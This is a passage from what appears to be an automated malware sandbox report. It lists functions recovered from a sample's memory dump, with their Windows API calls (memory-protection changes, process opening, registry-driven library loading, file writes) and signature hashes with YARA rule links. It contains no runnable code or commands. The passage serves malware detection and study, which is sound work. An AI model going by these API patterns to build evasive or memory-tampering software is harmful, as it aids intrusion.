                                                            • Instruction Fuzzy Hash: D711C676508210AFD7255F28ECC4D2A7BA8FB8D22270105AEF81693240D639BC158BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBD496, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,04BA23D0,?,?,00000000), ref: 04BBD4AC
                                                            • lstrlen.KERNEL32(?,?,?,?,04BA23D0,?,?,00000000), ref: 04BBD4B3
                                                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 04BBD4C1
                                                              • Part of subcall function 04BBF3A1: GetLocalTime.KERNEL32(00000000,00000000), ref: 04BBF3AB
                                                              • Part of subcall function 04BBF3A1: wsprintfA.USER32 ref: 04BBF3DE
                                                            • wsprintfA.USER32 ref: 04BBD4E3
                                                              • Part of subcall function 04BBA8BA: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04BBD50B,00000000,?,00000000,00000000,00000006,00000000), ref: 04BBA8D8
                                                              • Part of subcall function 04BBA8BA: wsprintfA.USER32 ref: 04BBA8FD
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 04BBD514
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                            • String ID:
                                                            • API String ID: 3847261958-0
                                                            • Opcode ID: 414adc2f68b5607cf6a3a5a0a12b726e150b8d3481fe926325ca6d2191cc134d
                                                            • Instruction ID: 986e28cd051aca7ab8bf9a1d47335e45a561bf630582febc06d2ae88cc564861
                                                            • Opcode Fuzzy Hash: 414adc2f68b5607cf6a3a5a0a12b726e150b8d3481fe926325ca6d2191cc134d
                                                            • Instruction Fuzzy Hash: 6F01A172100218BBDB112F26DC84EAF7F6DFB88364B008022FD1897211D67AAD61DFB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BACD5E, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BACD69
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BACD7A
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,04BC02E6,04BCB7A0,-0000000C,00000000,04BBC508,0000000C,00000000,?,0000000C,00000000), ref: 04BACD91
                                                            • VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,04BC02E6,04BCB7A0,-0000000C,00000000,04BBC508,0000000C,00000000,?,0000000C,00000000), ref: 04BACDAB
                                                            • GetLastError.KERNEL32(?,?,04BC02E6,04BCB7A0,-0000000C,00000000,04BBC508,0000000C,00000000,?,0000000C,00000000,?), ref: 04BACDB8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: 1fd805322dd75b908199268a6ef9e8b3c194068c307cc8cbf0c1f7633071e578
                                                            • Instruction ID: 0c9592d42f735eebdef7cdd97f6543c3f22dc31a0d052fa10a887a116833fb5e
                                                            • Opcode Fuzzy Hash: 1fd805322dd75b908199268a6ef9e8b3c194068c307cc8cbf0c1f7633071e578
                                                            • Instruction Fuzzy Hash: 1301A276200704EFD7209F25DC80E6ABBF9FF88721B104159EA46A3350D730FD019B20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA389A, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BA38A7
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 04BA38B7
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 04BA38C0
                                                            • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,04BB67F1,?,?,00000040), ref: 04BA38DE
                                                            • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,04BB67F1,?,?,00000040), ref: 04BA38EB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 3667519916-0
                                                            • Opcode ID: db73df254d80d6c374bee4fa70419114bfe9bbbdc150c7146e9c7f971f20e565
                                                            • Instruction ID: 154fa39a7993e1b757f17eebd6f62481ba80c2a1e6d0b2d40bcbf1e8ad966863
                                                            • Opcode Fuzzy Hash: db73df254d80d6c374bee4fa70419114bfe9bbbdc150c7146e9c7f971f20e565
                                                            • Instruction Fuzzy Hash: 96F03A70204700AFEA206B35DC88F2BB3E9FF48711F145669F941A2590CB28FC69CA21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA2730, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BA136B,?), ref: 04BA2738
                                                            • GetVersion.KERNEL32 ref: 04BA2747
                                                            • GetCurrentProcessId.KERNEL32 ref: 04BA2756
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BA2773
                                                            • GetLastError.KERNEL32 ref: 04BA2792
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                            • String ID:
                                                            • API String ID: 2270775618-0
                                                            • Opcode ID: c24c39425fd12fcee9640172ceb2c3a5c3aec5aed1549bedfa32a536a3f78002
                                                            • Instruction ID: 054f677b28e66a402d620085c94e39d5d644c801b4f5c5a366da0596a624fab8
                                                            • Opcode Fuzzy Hash: c24c39425fd12fcee9640172ceb2c3a5c3aec5aed1549bedfa32a536a3f78002
                                                            • Instruction Fuzzy Hash: C9F0E2706843419EE3648F35E88AB193BB4E718B42F10455BA20AD62C0D7789D61CB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBF43C, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 04BBF460
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • wsprintfA.USER32 ref: 04BBF491
                                                              • Part of subcall function 04BAC12C: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BAC142
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC16A
                                                              • Part of subcall function 04BAC12C: lstrlen.KERNEL32(00000008), ref: 04BAC179
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC1B9
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC1EE
                                                              • Part of subcall function 04BAC12C: memcpy.NTDLL(00000000,?,?), ref: 04BAC1FB
                                                              • Part of subcall function 04BAC12C: memcpy.NTDLL(00000008,04BC63D8,00000002,00000000,?,?), ref: 04BAC210
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC233
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BBF506
                                                              • Part of subcall function 04BC3EDA: RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC3EF0
                                                              • Part of subcall function 04BC3EDA: RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC3F0B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000), ref: 04BBF4F0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BBF4FC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 3553201432-0
                                                            • Opcode ID: 6c4e9df576c8ab7a58c2640ef8ae6155ea683e99d4afa9c65fa64006a0401a19
                                                            • Instruction ID: d07027998f5d4c62c9bc00e04b506509b4d52d3956e944a9eec4d3d22148b10c
                                                            • Opcode Fuzzy Hash: 6c4e9df576c8ab7a58c2640ef8ae6155ea683e99d4afa9c65fa64006a0401a19
                                                            • Instruction Fuzzy Hash: FF21F67690014EEBCF11DFA5DD84CEF7BB9FB48304B004466F915A6210D675AA20DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA3CC3, Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA91D3: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 04BA91EE
                                                              • Part of subcall function 04BA91D3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 04BA923C
                                                              • Part of subcall function 04BA91D3: GetProcAddress.KERNEL32(00000000,?), ref: 04BA9255
                                                              • Part of subcall function 04BA91D3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 04BA92A6
                                                            • GetLastError.KERNEL32(?,?,?), ref: 04BA3E51
                                                            • FreeLibrary.KERNEL32(?,?,?), ref: 04BA3EB9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                            • String ID:
                                                            • API String ID: 1730969706-0
                                                            • Opcode ID: bef72d6fe64e1c80d76d39df9351c869b326830f0e2cbfc628f1c98eb674c49a
                                                            • Instruction ID: 7c99e26d5e741c8166e94d4fba7ac2180ea1f86b6daf8fba4ad416f6fd2c801d
                                                            • Opcode Fuzzy Hash: bef72d6fe64e1c80d76d39df9351c869b326830f0e2cbfc628f1c98eb674c49a
                                                            • Instruction Fuzzy Hash: 8D71D8B5E00209EFCF10DFE5C8849AEBBB9FF48305B1498A9E916E7250D735A951CF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBE73D, Relevance: 6.2, APIs: 4, Instructions: 156threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BBBAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04BB4A41,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000), ref: 04BBBAED
                                                              • Part of subcall function 04BBBAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BBBB10
                                                              • Part of subcall function 04BBBAE4: memset.NTDLL ref: 04BBBB1F
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,7656D3B0,05C8B17C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B5D
                                                              • Part of subcall function 04BC0B38: StrTrimA.SHLWAPI(00000000,04BC847C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B7C
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B88
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BBE7D5
                                                            • GetCurrentThread.KERNEL32 ref: 04BBE7E8
                                                            • GetModuleHandleA.KERNEL32(00000000,04BC63D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 04BBE86F
                                                            • GetShellWindow.USER32 ref: 04BBE876
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1517849391-0
                                                            • Opcode ID: 9868da151c8b69c0593199b3ecd9ec6bc2d1c6271a146ad41e4bd0f3a11f6cd7
                                                            • Instruction ID: 9944a9d257e5449c49155f001ebc1e113fbf282ea7a314b80386da705fed4d13
                                                            • Opcode Fuzzy Hash: 9868da151c8b69c0593199b3ecd9ec6bc2d1c6271a146ad41e4bd0f3a11f6cd7
                                                            • Instruction Fuzzy Hash: A5514D71904705EFE710DF64C884AEBB7E9EF88714F0049AAF5C5A7161DAB0F944CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB4CF5, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04BB4DA8
                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04BB4DBE
                                                            • memset.NTDLL ref: 04BB4E67
                                                            • memset.NTDLL ref: 04BB4E7D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$_allmul_aulldiv
                                                            • String ID:
                                                            • API String ID: 3041852380-0
                                                            • Opcode ID: f23c543fc00d9bda4f3023ab9a43b3493358020a4730df8d49afff7e9c3d3d3f
                                                            • Instruction ID: ece31f5589b7b87d5eb461436428bbf8e1b59be885828e70848e822e2ee1c41d
                                                            • Opcode Fuzzy Hash: f23c543fc00d9bda4f3023ab9a43b3493358020a4730df8d49afff7e9c3d3d3f
                                                            • Instruction Fuzzy Hash: FE41A371600219BFEB109E68DC80BFE7779EF45314F0049A9F99597181EBB0BE548BD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAED66, Relevance: 6.1, APIs: 4, Instructions: 129stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCommandLineA.KERNEL32(?,00000000,00000000,?,00000000,04BB227C,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BAED76
                                                            • StrChrA.SHLWAPI(00000000,00000020,?,00000000,04BB227C,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BAED87
                                                              • Part of subcall function 04BBBAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04BB4A41,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000), ref: 04BBBAED
                                                              • Part of subcall function 04BBBAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BBBB10
                                                              • Part of subcall function 04BBBAE4: memset.NTDLL ref: 04BBBB1F
                                                            • ExitProcess.KERNEL32 ref: 04BAEED5
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,7656D3B0,05C8B17C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B5D
                                                              • Part of subcall function 04BC0B38: StrTrimA.SHLWAPI(00000000,04BC847C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B7C
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B88
                                                            • lstrcmp.KERNEL32(00000000,?), ref: 04BAEDF3
                                                              • Part of subcall function 04BBCC4A: FindFirstFileW.KERNEL32(?,?,?,?), ref: 04BBCCD6
                                                              • Part of subcall function 04BBCC4A: lstrlenW.KERNEL32(?), ref: 04BBCCF2
                                                              • Part of subcall function 04BBCC4A: lstrlenW.KERNEL32(?), ref: 04BBCD0A
                                                              • Part of subcall function 04BBCC4A: lstrcpyW.KERNEL32(00000000,?), ref: 04BBCD23
                                                              • Part of subcall function 04BBCC4A: lstrcpyW.KERNEL32(00000002), ref: 04BBCD38
                                                              • Part of subcall function 04BBCC4A: FindNextFileW.KERNEL32(?,00000010), ref: 04BBCD60
                                                              • Part of subcall function 04BBCC4A: FindClose.KERNEL32(00000002), ref: 04BBCD6E
                                                              • Part of subcall function 04BBCC4A: FreeLibrary.KERNEL32(?), ref: 04BBCD80
                                                              • Part of subcall function 04BB9976: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BB9999
                                                              • Part of subcall function 04BB9976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,04BAEE33,?,?,00000000,04BB227C,00000000,73BCF5B0,04BA824E), ref: 04BB99DA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
                                                            • String ID:
                                                            • API String ID: 2123058440-0
                                                            • Opcode ID: 156b9e8cda608e8a90d31bd27febda42eb9524c39c90a1e88ed17396ec60b530
                                                            • Instruction ID: 40893c7f9d865d1a105d6eb3ea15f412d6218f63d703053dcc42a33aeaa105bc
                                                            • Opcode Fuzzy Hash: 156b9e8cda608e8a90d31bd27febda42eb9524c39c90a1e88ed17396ec60b530
                                                            • Instruction Fuzzy Hash: B5416C71608301EFE750EF65D8C496FB7E9EB88214F048C6EF599D3150EA35E8188B62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB7FB3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB5CE8: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,04BA908A), ref: 04BB5CF4
                                                              • Part of subcall function 04BB5CE8: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04BB5D52
                                                              • Part of subcall function 04BB5CE8: lstrcpy.KERNEL32(00000000,00000000), ref: 04BB5D62
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 04BB8002
                                                            • wsprintfA.USER32 ref: 04BB8032
                                                            • GetLastError.KERNEL32 ref: 04BB80A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                            • String ID: `
                                                            • API String ID: 324226357-1850852036
                                                            • Opcode ID: 8d4f2863f20b35ffe44f8de6c2713bf6391517a13099e2748444c33fefd31ab2
                                                            • Instruction ID: f4538dbc3a5a043fb8a207e52ce5c46b1ecfacaea9b5531cd3ae15702ce9912a
                                                            • Opcode Fuzzy Hash: 8d4f2863f20b35ffe44f8de6c2713bf6391517a13099e2748444c33fefd31ab2
                                                            • Instruction Fuzzy Hash: F931BF71500709ABDB21AF65CC84AEB7BBDFF04354F50806AF95597150EBB0F9248BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBF997, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 04BBFAB7
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetLastError.KERNEL32 ref: 04BBFA2B
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04BBFA3B
                                                            • GetLastError.KERNEL32 ref: 04BBFA5B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 35602742-0
                                                            • Opcode ID: 1d2443caf0e903b2bcb6605582d9fd91d3399d555d04582f5b276f938df58ac6
                                                            • Instruction ID: e2583216860c79cc01c90d759146af2e86360ac7808f09805d2a3bcc2b7e3ced
                                                            • Opcode Fuzzy Hash: 1d2443caf0e903b2bcb6605582d9fd91d3399d555d04582f5b276f938df58ac6
                                                            • Instruction Fuzzy Hash: BA410BB0900209EFDF149FA4DC849FDBBB9FF08345B6044AAE581E7150D7B4AE41DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBF774, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB52CD: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 04BB52DB
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BBF7DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BBF82B
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,04BBF1B3,00000000,04BBF1B4,00000080,00000000,00000000,04BC4C6A,00000000,04BBF1B3,?), ref: 04BB537E
                                                              • Part of subcall function 04BB533D: GetLastError.KERNEL32 ref: 04BB5388
                                                              • Part of subcall function 04BB533D: WaitForSingleObject.KERNEL32(000000C8), ref: 04BB53AD
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BB53CE
                                                              • Part of subcall function 04BB533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 04BB53F6
                                                              • Part of subcall function 04BB533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 04BB540B
                                                              • Part of subcall function 04BB533D: SetEndOfFile.KERNEL32(00000001), ref: 04BB5418
                                                              • Part of subcall function 04BB533D: CloseHandle.KERNEL32(00000001), ref: 04BB5430
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,04BA7236,?,?,?,?,?,00000000), ref: 04BBF860
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,04BA7236,?,?,?,?,?,00000000,?,00000000,?,04BA4A91), ref: 04BBF870
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                            • String ID:
                                                            • API String ID: 4200334623-0
                                                            • Opcode ID: c5e8e917a0d1201de5dc6d2ed974e297482a70678e811be5b288488d7f9aba08
                                                            • Instruction ID: 5f0e891ab6df1ee25ef304e0f741868ad507bc4e21f8b924a2eced25692b571b
                                                            • Opcode Fuzzy Hash: c5e8e917a0d1201de5dc6d2ed974e297482a70678e811be5b288488d7f9aba08
                                                            • Instruction Fuzzy Hash: 41310575900119FFEB109FA5DC89CBEBBBDEB08354B1100A6F545E7250D7B1AE50DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC1435, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BC148E
                                                            • memcpy.NTDLL(00000018,?,?), ref: 04BC14B7
                                                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00019D73,00000000,000000FF,00000008), ref: 04BC14F6
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC1509
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                            • String ID:
                                                            • API String ID: 2780211928-0
                                                            • Opcode ID: 7f5b99a86f758f59c2bac9fc5d97993b276ac7b8be8e3d965cba81d7b33da19b
                                                            • Instruction ID: 6ba186cf179517af20e899ee2e5a2e1dfbba70bd8e921ba69a2c1274917b6676
                                                            • Opcode Fuzzy Hash: 7f5b99a86f758f59c2bac9fc5d97993b276ac7b8be8e3d965cba81d7b33da19b
                                                            • Instruction Fuzzy Hash: 6A315071200206EFDB208F29EC85E9A7BB9FB08761F10455AF916D7290D775E9118FA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA30C0, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?), ref: 04BA30EF
                                                            • SetEvent.KERNEL32(?), ref: 04BA3139
                                                            • TlsSetValue.KERNEL32(00000001), ref: 04BA3173
                                                            • TlsSetValue.KERNEL32(00000000), ref: 04BA318F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$Event
                                                            • String ID:
                                                            • API String ID: 3803239005-0
                                                            • Opcode ID: b372de7fe19acf816fa57b18fbc3cfce474d4ab1fea078c54dd8e8ce3d967de6
                                                            • Instruction ID: 2c823913a6b79465dd01fb407c8d0decaaa3de125537190d95d4c45e780055cb
                                                            • Opcode Fuzzy Hash: b372de7fe19acf816fa57b18fbc3cfce474d4ab1fea078c54dd8e8ce3d967de6
                                                            • Instruction Fuzzy Hash: 72217C31208204AFDB218F69DCC8A6A7BF6FB45350B10596AF91AD7260D771FC72DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA8E77, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC33D9: memcpy.NTDLL(00000000,00000110,04BB5AB0,04BB5AB0,?,00000000,00000001,00000000,73B74D40), ref: 04BC340F
                                                              • Part of subcall function 04BC33D9: memset.NTDLL ref: 04BC3485
                                                              • Part of subcall function 04BC33D9: memset.NTDLL ref: 04BC3499
                                                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 04BA8ECF
                                                            • lstrcmpi.KERNEL32(00000000,?), ref: 04BA8EF6
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 04BA8F3B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 04BA8F4C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                            • String ID:
                                                            • API String ID: 1065503980-0
                                                            • Opcode ID: f1ca8b929e12872a418157ab8ab09d14408413647901e68ca5476f692ce17678
                                                            • Instruction ID: 584c4255038c9430fe7c2513ebc8e939e31f02c2aea560c90807f774bf1f7fca
                                                            • Opcode Fuzzy Hash: f1ca8b929e12872a418157ab8ab09d14408413647901e68ca5476f692ce17678
                                                            • Instruction Fuzzy Hash: 7E214871A0420AEFEF11AFA4DC84EAD7BB9EB08308F0044A6F905E7110D675FD649B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA8CD3, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BA8D02
                                                            • lstrlen.KERNEL32(00000000), ref: 04BA8D12
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • strcpy.NTDLL ref: 04BA8D29
                                                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04BA8D33
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                            • String ID:
                                                            • API String ID: 528014985-0
                                                            • Opcode ID: a2e4eeb0c20aae41ae4e1b1a412025e8cfb53b1d37bbed52c5dc0879f6de9257
                                                            • Instruction ID: 85ad21578da770b2e15e878ce214c4b8d96b9d463b06d6e2383aba60eef9bd0c
                                                            • Opcode Fuzzy Hash: a2e4eeb0c20aae41ae4e1b1a412025e8cfb53b1d37bbed52c5dc0879f6de9257
                                                            • Instruction Fuzzy Hash: C421C271108301AFE7206F64E889B2B77F8EF58315F00845EF99687641EB78F820A761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC3EDA, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC3EF0
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC3F0B
                                                            • GetLastError.KERNEL32 ref: 04BC3F79
                                                            • GetLastError.KERNEL32 ref: 04BC3F88
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
